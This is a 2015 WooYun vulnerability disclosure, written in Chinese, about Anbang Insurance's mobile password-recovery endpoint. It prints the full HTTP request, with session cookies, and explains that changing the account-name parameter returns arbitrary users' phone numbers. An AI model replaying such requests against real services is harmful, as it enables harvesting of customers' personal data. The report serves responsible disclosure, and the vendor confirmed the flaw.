当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141380

漏洞标题:安邦保险集团某处漏洞可查询任意用户的手机号等敏感信息

相关厂商:安邦保险集团

漏洞作者: Martial

提交时间:2015-09-15 19:31

修复时间:2015-11-02 08:46

公开时间:2015-11-02 08:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

注意是任意用户哦

详细说明:

问题出在客户端上的 找回密码处
我抓到了数据包如下

POST /sso/protable/mobileWebForgetPasswordAction.do HTTP/1.1
Host: y.abic.cn:8085
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Referer: http://y.abic.cn:8085/sso/webservice/sn/protable/mobileSecurityWebServiceAction.do?method=AutoLoginInitPage&viewType=AppView&gotoPage=ForgetPassword&loginVisible=false&backUrl=http://127.0.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Cookie: sso-johnhao-cookie3=fcdbb062f6ef7a4088a81c770ed72f42||da73818f66f64e201456c7c0d40179c9; JSESSIONID-LifeApp=GJLHV39TpT1zXqLl3L2D6JPsdvCVKfhFTwRhPxTn7sv9CJTfyhQv!885301477; JSESSIONID-SSO=HkmrV39NqrQ5JgVRxqVgL2VzpDLMyGZQJc5QZfkhvXJ7F6mNRxyJ!-891690133
Content-Length: 113
Origin: http://y.abic.cn:8085
Accept-Encoding: gzip, deflate
method=GetForgetPasswordAccount&accountKeyword=zhangwei&personalMobileNo=&maskPersonalMobileNo=&verificationCode=


然后我们对accountKeyword进行修改 我用张伟测试下
然后看下返回值

1.jpg


我们来查看几个试试

2.jpg


3.jpg


漏洞证明:

4.jpg

修复方案:

加验证

版权声明:转载请注明来源 Martial@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-18 08:45

厂商回复:

谢谢支持,正在整改

最新状态:

暂无


漏洞评价:

评论